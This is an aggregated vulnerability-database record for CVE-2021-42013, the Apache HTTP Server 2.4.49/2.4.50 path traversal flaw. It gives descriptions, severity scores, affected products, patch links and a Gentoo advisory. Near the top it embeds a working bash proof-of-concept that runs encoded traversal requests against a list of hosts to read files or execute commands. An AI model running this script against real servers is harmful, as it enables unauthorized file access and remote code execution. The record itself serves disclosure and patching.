ID

VAR-202110-1690


CVE

CVE-2021-42013


TITLE

Apache HTTP Server directory traversal vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2021-000090

DESCRIPTION

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

This vulnerability information was reported directly to the product developer by the following person and, after coordination with the product developer, was published on JVN to inform product users. Reporter: Mr. Shugo Kumasaka, Internet Initiative Co., Ltd.

A remote third party may be able to access files placed outside the document root that are not protected by "require all denied".

The server is fast, reliable and extensible through a simple API.

A NULL pointer dereference was found in Apache httpd mod_h2. The highest threat from this flaw is to system integrity. (CVE-2021-33193)

A NULL pointer dereference in httpd allows an unauthenticated remote malicious user to crash httpd by providing malformed HTTP requests. The highest threat from this vulnerability is to system availability. (CVE-2021-34798)

An out-of-bounds read in mod_proxy_uwsgi of httpd allows a remote unauthenticated malicious user to crash the service through a crafted request. The highest threat from this vulnerability is to system availability. (CVE-2021-36160)

An out-of-bounds write in function ap_escape_quotes of httpd allows an unauthenticated remote malicious user to crash the server or potentially execute code on the system with the privileges of the httpd user, by providing malicious input to the function. (CVE-2021-39275)

A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated malicious user to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network. (CVE-2021-40438)

While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)

A path traversal flaw was found in Apache 2.4.49. Additionally, this flaw could leak the source of interpreted files like CGI scripts. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This is an incomplete fix for CVE-2021-41773. (CVE-2021-42013)

    # Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
    # Date: 10/05/2021
    # Exploit Author: Lucas Souza https://lsass.io
    # Vendor Homepage: https://apache.org/
    # Version: 2.4.50
    # Tested on: 2.4.50
    # CVE : CVE-2021-42013
    # Credits: Ash Daulton and the cPanel Security Team

    #!/bin/bash

    if [[ $1 == '' ]]; [[ $2 == '' ]]; then
    echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
    echo ./PoC.sh targets.txt /etc/passwd
    echo ./PoC.sh targets.txt /bin/sh id
    exit
    fi
    for host in $(cat $1); do
    echo $host
    curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done

    # PoC.sh targets.txt /etc/passwd
    # PoC.sh targets.txt /bin/sh whoami
------------------------------------------------------------------------
Gentoo Linux Security Advisory GLSA 202208-20
https://security.gentoo.org/
------------------------------------------------------------------------

Severity: High
Title: Apache HTTPD: Multiple Vulnerabilities
Date: August 14, 2022
Bugs: #813429, #816399, #816864, #829722, #835131, #850622
ID: 202208-20

Synopsis
========

Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution.

Affected packages
=================

    Package                      Vulnerable    Unaffected
    -----------------------------------------------------
    1  app-admin/apache-tools    < 2.4.54      >= 2.4.54
    2  www-servers/apache        < 2.4.54      >= 2.4.54

Description
===========

Multiple vulnerabilities have been discovered in Apache HTTPD. Please review the CVE identifiers referenced below for details.

Impact
======

Please review the referenced CVE identifiers for details.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Apache HTTPD users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.54"

All Apache HTTPD tools users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-admin/apache-tools-2.4.54"

References
==========

[ 1 ] CVE-2021-33193 https://nvd.nist.gov/vuln/detail/CVE-2021-33193
[ 2 ] CVE-2021-34798 https://nvd.nist.gov/vuln/detail/CVE-2021-34798
[ 3 ] CVE-2021-36160 https://nvd.nist.gov/vuln/detail/CVE-2021-36160
[ 4 ] CVE-2021-39275 https://nvd.nist.gov/vuln/detail/CVE-2021-39275
[ 5 ] CVE-2021-40438 https://nvd.nist.gov/vuln/detail/CVE-2021-40438
[ 6 ] CVE-2021-41524 https://nvd.nist.gov/vuln/detail/CVE-2021-41524
[ 7 ] CVE-2021-41773 https://nvd.nist.gov/vuln/detail/CVE-2021-41773
[ 8 ] CVE-2021-42013 https://nvd.nist.gov/vuln/detail/CVE-2021-42013
[ 9 ] CVE-2021-44224 https://nvd.nist.gov/vuln/detail/CVE-2021-44224
[ 10 ] CVE-2021-44790 https://nvd.nist.gov/vuln/detail/CVE-2021-44790
[ 11 ] CVE-2022-22719 https://nvd.nist.gov/vuln/detail/CVE-2022-22719
[ 12 ] CVE-2022-22720 https://nvd.nist.gov/vuln/detail/CVE-2022-22720
[ 13 ] CVE-2022-22721 https://nvd.nist.gov/vuln/detail/CVE-2022-22721
[ 14 ] CVE-2022-23943 https://nvd.nist.gov/vuln/detail/CVE-2022-23943
[ 15 ] CVE-2022-26377 https://nvd.nist.gov/vuln/detail/CVE-2022-26377
[ 16 ] CVE-2022-28614 https://nvd.nist.gov/vuln/detail/CVE-2022-28614
[ 17 ] CVE-2022-28615 https://nvd.nist.gov/vuln/detail/CVE-2022-28615
[ 18 ] CVE-2022-29404 https://nvd.nist.gov/vuln/detail/CVE-2022-29404
[ 19 ] CVE-2022-30522 https://nvd.nist.gov/vuln/detail/CVE-2022-30522
[ 20 ] CVE-2022-30556 https://nvd.nist.gov/vuln/detail/CVE-2022-30556
[ 21 ] CVE-2022-31813 https://nvd.nist.gov/vuln/detail/CVE-2022-31813

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202208-20

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Trust: 2.43

sources: NVD: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // PACKETSTORM: 164501 // PACKETSTORM: 168072

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2022-03220

AFFECTED PRODUCTS

vendor: apache, model: http server, scope: eq, version: 2.4.50

Trust: 1.6

vendor: apache, model: http server, scope: eq, version: 2.4.49

Trust: 1.6

vendor: oracle, model: instantis enterprisetrack, scope: eq, version: 17.2

Trust: 1.0

vendor: fedoraproject, model: fedora, scope: eq, version: 34

Trust: 1.0

vendor: oracle, model: instantis enterprisetrack, scope: eq, version: 17.3

Trust: 1.0

vendor: oracle, model: instantis enterprisetrack, scope: eq, version: 17.1

Trust: 1.0

vendor: netapp, model: cloud backup, scope: eq, version: -

Trust: 1.0

vendor: oracle, model: jd edwards enterpriseone tools, scope: lt, version: 9.2.6.0

Trust: 1.0

vendor: fedoraproject, model: fedora, scope: eq, version: 35

Trust: 1.0

vendor: oracle, model: secure backup, scope: lt, version: 18.1.0.1.0

Trust: 1.0

vendor: Hitachi, model: Hitachi high-reliability server rv3000, scope: -, version: -

Trust: 0.8

vendor: apache, model: http server, scope: -, version: -

Trust: 0.8

sources: CNVD: CNVD-2022-03220 // JVNDB: JVNDB-2021-000090 // NVD: CVE-2021-42013

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-42013
value: CRITICAL

Trust: 1.0

IPA: JVNDB-2021-000090
value: HIGH

Trust: 0.8

CNVD: CNVD-2022-03220
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202110-413
value: CRITICAL

Trust: 0.6

VULMON: CVE-2021-42013
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2021-42013
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.1

IPA: JVNDB-2021-000090
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2022-03220
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2021-42013
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

IPA: JVNDB-2021-000090
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.0

problemtype:NVD-CWE-Other

Trust: 1.0

problemtype:Path traversal (CWE-22) [IPA evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-000090 // NVD: CVE-2021-42013

THREAT TYPE

remote

Trust: 0.8

sources: PACKETSTORM: 165089 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-202110-413

PATCH

title: hitachi-sec-2023-217, url: https://downloads.apache.org/httpd/CHANGES_2.4.51

Trust: 0.8

title: Patch for Apache HTTP Server Directory Traversal Vulnerability, url: https://www.cnvd.org.cn/patchInfo/show/313141

Trust: 0.6

title: Apache HTTP Server Repair measures for path traversal vulnerabilities, url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=165084

Trust: 0.6

title: Red Hat: CVE-2021-42013, url: https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2021-42013

Trust: 0.1

title: Arch Linux Advisories: [ASA-202110-1] apache: directory traversal, url: https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories&qid=ASA-202110-1

Trust: 0.1

title: Arch Linux Issues:, url: https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues&qid=CVE-2021-42013 log

Trust: 0.1

title: Cisco: Apache HTTP Server Vulnerabilties: October 2021, url: https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-apache-httpd-pathtrv-LAzg68cZ

Trust: 0.1

title: Amazon Linux AMI: ALAS-2021-1543, url: https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2021-1543

Trust: 0.1

title: Amazon Linux 2: ALAS2-2021-1716, url: https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2021-1716

Trust: 0.1

title: Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.py, url: https://github.com/mightysai1997/cve-2021-42013.get

Trust: 0.1

title: Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.py, url: https://github.com/walnutsecurity/CVE-2021-42013

Trust: 0.1

title: Usage cve-2021-42013.py, url: https://github.com/imhunterand/CVE-2021-42013

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/viliuspovilaika/cve-2021-42013

Trust: 0.1

title: Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.py, url: https://github.com/mightysai1997/cve-2021-42013

Trust: 0.1

title: Lab for CVE-2021-42013, url: https://github.com/Turzum/ps-lab-cve-2021-42013

Trust: 0.1

title: CVE-2021-42013 Vulnerable service, url: https://github.com/12345qwert123456/CVE-2021-42013

Trust: 0.1

title: CVE-2021-42013 - Apache HTTP Server 2.4.50 How to Run the CVE-2021-42013-Path Traversal Lab How to Run the CVE-2021-42013-RCE Lab, url: https://github.com/BincangSiber/CVE-2021-42013

Trust: 0.1

title: CVE-2021-42013-LAB, url: https://github.com/jas9reet/CVE-2021-42013-LAB

Trust: 0.1

title: Apache 2.4.50 - Path Traversal or Remote Code Execution Vulnerable Configurations in httpd.conf Lab for CVE-2021-42013 Usage cve-2021-42013.py, url: https://github.com/walnutsecurity/cve-2021-42013

Trust: 0.1

title: CVE-2021-42013 - Apache HTTP Server 2.4.50 How to Run the CVE-2021-42013-Path Traversal Lab How to Run the CVE-2021-42013-RCE Lab, url: https://github.com/LayarKacaSiber/CVE-2021-42013

Trust: 0.1

title: Advent-of-Cyber-3-2021-, url: https://github.com/ibrahimetecicek/Advent-of-Cyber-3-2021-

Trust: 0.1

title: CVE-2021-42013-ApacheRCE, url: https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE

Trust: 0.1

title: Dockerizing a Vulnerability: cve-2021-42013, url: https://github.com/cybfar/cve-2021-42013-httpd

Trust: 0.1

title: CVE-2021-42013 Apache 2.4.50 vulnerability, url: https://github.com/Hamesawian/CVE-2021-42013

Trust: 0.1

title: cve-2021-42013, url: https://github.com/mightysai1997/cve-2021-42013L

Trust: 0.1

title: cve-2021-42013, url: https://github.com/Vulnmachines/cve-2021-42013

Trust: 0.1

title: Read Me, url: https://github.com/Mallaichte/efed-management-system

Trust: 0.1

title: Container-Security (Docker & Kubernetes), url: https://github.com/Vamckis/Container-Security

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/theykillmeslowly/CVE-2021-42013

Trust: 0.1

title: Project Title, url: https://github.com/mightysai1997/-apache_2.4.50

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/cryst4lliz3/CVE-2021-42013

Trust: 0.1

title: CVE-2021-42013_Reverse-Shell, url: https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell

Trust: 0.1

title: Apache HTTP Server 2.4.50 LFI & RCE, url: https://github.com/hadrian3689/apache_2.4.50

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/TheLastVvV/CVE-2021-42013

Trust: 0.1

title: Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2) Credits: Ash Daulton & cPanel Security Team Date: 24/07/2021 Exploit Author: TheLastVvV.com Vendor Homepage: https://apache.org/ Version: Apache 2.4.50 with CGI enable Tested on : Debian 5.10.28 CVE : CVE-2021-42013, url: https://github.com/Luke-cmd/sharecode

Trust: 0.1

title: comp.sec.300.2021.2022, url: https://github.com/codinglikejesus/comp.sec.300.2021.2022

Trust: 0.1

title: apache-exploit-CVE-2021-42013, url: https://github.com/andrea-mattioli/apache-exploit-CVE-2021-42013

Trust: 0.1

title: https://github.com/ralvares/security-demos, url: https://github.com/ralvares/security-demos

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/rnsss/CVE-2021-42013

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/khidhir-ibrahim/CVE-2021-42013

Trust: 0.1

title: cve-2021-42013, url: https://github.com/Rubikcuv5/cve-2021-42013

Trust: 0.1

title: CVE-2021-42013, url: https://github.com/twseptian/CVE-2021-42013-Docker-Lab

Trust: 0.1

title: https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP, url: https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // CNNVD: CNNVD-202110-413

EXTERNAL IDS

db: NVD, id: CVE-2021-42013

Trust: 3.4

db: JVN, id: JVN51106450

Trust: 2.4

db: PACKETSTORM, id: 164501

Trust: 1.7

db: PACKETSTORM, id: 164941

Trust: 1.6

db: PACKETSTORM, id: 164629

Trust: 1.6

db: PACKETSTORM, id: 167397

Trust: 1.6

db: PACKETSTORM, id: 164609

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/2

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/15/3

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/07/6

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/09/1

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/6

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/16/1

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/1

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/5

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/11/4

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/4

Trust: 1.6

db: OPENWALL, id: OSS-SECURITY/2021/10/08/3

Trust: 1.6

db: PACKETSTORM, id: 165089

Trust: 1.1

db: JVNDB, id: JVNDB-2021-000090

Trust: 0.8

db: PACKETSTORM, id: 168072

Trust: 0.7

db: CNVD, id: CNVD-2022-03220

Trust: 0.6

db: EXPLOIT-DB, id: 50512

Trust: 0.6

db: EXPLOIT-DB, id: 50446

Trust: 0.6

db: EXPLOIT-DB, id: 50406

Trust: 0.6

db: AUSCERT, id: ESB-2021.3348

Trust: 0.6

db: CS-HELP, id: SB2021101513

Trust: 0.6

db: CS-HELP, id: SB2022042513

Trust: 0.6

db: CS-HELP, id: SB2021100718

Trust: 0.6

db: CS-HELP, id: SB2021100802

Trust: 0.6

db: CXSECURITY, id: WLB-2021100131

Trust: 0.6

db: CXSECURITY, id: WLB-2021110108

Trust: 0.6

db: CNNVD, id: CNNVD-202110-413

Trust: 0.6

db: VULMON, id: CVE-2021-42013

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // VULMON: CVE-2021-42013 // JVNDB: JVNDB-2021-000090 // PACKETSTORM: 165089 // PACKETSTORM: 164501 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

REFERENCES

url:http://packetstormsecurity.com/files/164501/apache-http-server-2.4.50-path-traversal-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/165089/apache-http-server-2.4.50-cve-2021-42013-exploitation.html

Trust: 2.2

url:http://packetstormsecurity.com/files/167397/apache-2.4.50-remote-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/164941/apache-http-server-2.4.50-remote-code-execution.html

Trust: 2.2

url:http://packetstormsecurity.com/files/164629/apache-2.4.49-2.4.50-traversal-remote-code-execution.html

Trust: 2.2

url:https://www.oracle.com/security-alerts/cpuapr2022.html

Trust: 2.2

url:https://security.gentoo.org/glsa/202208-20

Trust: 1.7

url:https://httpd.apache.org/security/vulnerabilities_24.html

Trust: 1.6

url:https://security.netapp.com/advisory/ntap-20211029-0009/

Trust: 1.6

url:https://www.oracle.com/security-alerts/cpujan2022.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/16/1

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/15/3

Trust: 1.6

url:http://packetstormsecurity.com/files/164609/apache-http-server-2.4.50-remote-code-execution.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/4

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/3

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/2

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/09/1

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/1

Trust: 1.6

url:https://www.povilaika.com/apache-2-4-50-exploit/

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/6

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/07/6

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/08/5

Trust: 1.6

url:http://jvn.jp/en/jp/jvn51106450/index.html

Trust: 1.6

url:http://www.openwall.com/lists/oss-security/2021/10/11/4

Trust: 1.6

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-

Trust: 1.2

url:https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3%40%3ccvs.httpd.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837%40%3cannounce.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb%40%3cusers.httpd.apache.org%3e

Trust: 1.0

url:https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/

Trust: 1.0

url:https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/

Trust: 1.0

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-httpd-pathtrv-lazg68cz

Trust: 1.0

url:https://nvd.nist.gov/vuln/detail/cve-2021-42013

Trust: 0.9

url:https://jvn.jp/jp/jvn51106450/index.html

Trust: 0.8

url:https://www.ipa.go.jp/security/ciadr/vul/alert20211006.html

Trust: 0.8

url:https://www.jpcert.or.jp/at/2021/at210043.html

Trust: 0.8

url:https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837@%3cannounce.apache.org%3e

Trust: 0.6

url:httpd.apache.org%3e

Trust: 0.6

url:https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3@%3ccvs.

Trust: 0.6

url:https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb@%3cusers.

Trust: 0.6

url:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/

Trust: 0.6

url:httpd.apache.org/security/vulnerabilities_24.html

Trust: 0.6

url:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/

Trust: 0.6

url:https://access.redhat.com/security/cve/cve-2021-42013

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021100131

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021100718

Trust: 0.6

url:https://www.exploit-db.com/exploits/50406

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2021.3348

Trust: 0.6

url:https://www.exploit-db.com/exploits/50446

Trust: 0.6

url:https://www.exploit-db.com/exploits/50512

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2022042513

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021101513

Trust: 0.6

url:https://vigilance.fr/vulnerability/apache-http-server-2-4-49-50-directory-traversal-via-alias-like-directives-36614

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021100802

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021110108

Trust: 0.6

url:httpd-pathtrv-lazg68cz

Trust: 0.6

url:https://packetstormsecurity.com/files/168072/gentoo-linux-security-advisory-202208-20.html

Trust: 0.6

url:https://lsass.io

Trust: 0.1

url:https://apache.org/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22721

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-28614

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-31813

Trust: 0.1

url:https://bugs.gentoo.org.

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-29404

Trust: 0.1

url:https://creativecommons.org/licenses/by-sa/2.5

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-44790

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-28615

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-30522

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-41773

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-41524

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-44224

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22719

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-40438

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-30556

Trust: 0.1

url:https://security.gentoo.org/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-36160

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-34798

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-23943

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-39275

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-22720

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33193

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-26377

Trust: 0.1

sources: CNVD: CNVD-2022-03220 // JVNDB: JVNDB-2021-000090 // PACKETSTORM: 165089 // PACKETSTORM: 164501 // PACKETSTORM: 168072 // CNNVD: CNNVD-202110-413 // NVD: CVE-2021-42013

CREDITS

Valentin Lobstein

Trust: 0.6

sources: CNNVD: CNNVD-202110-413

SOURCES

db: CNVD, id: CNVD-2022-03220
db: VULMON, id: CVE-2021-42013
db: JVNDB, id: JVNDB-2021-000090
db: PACKETSTORM, id: 165089
db: PACKETSTORM, id: 164501
db: PACKETSTORM, id: 168072
db: CNNVD, id: CNNVD-202110-413
db: NVD, id: CVE-2021-42013

LAST UPDATE DATE

2024-08-14T12:17:33.069000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2022-03220, date: 2022-01-13T00:00:00
db: VULMON, id: CVE-2021-42013, date: 2023-11-07T00:00:00
db: JVNDB, id: JVNDB-2021-000090, date: 2023-12-12T07:40:00
db: CNNVD, id: CNNVD-202110-413, date: 2022-08-16T00:00:00
db: NVD, id: CVE-2021-42013, date: 2024-07-26T19:39:26.967

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2022-03220, date: 2021-01-12T00:00:00
db: VULMON, id: CVE-2021-42013, date: 2021-10-07T00:00:00
db: JVNDB, id: JVNDB-2021-000090, date: 2021-10-08T00:00:00
db: PACKETSTORM, id: 165089, date: 2021-11-29T18:03:21
db: PACKETSTORM, id: 164501, date: 2021-10-13T15:03:24
db: PACKETSTORM, id: 168072, date: 2022-08-15T16:02:48
db: CNNVD, id: CNNVD-202110-413, date: 2021-10-07T00:00:00
db: NVD, id: CVE-2021-42013, date: 2021-10-07T16:15:09.270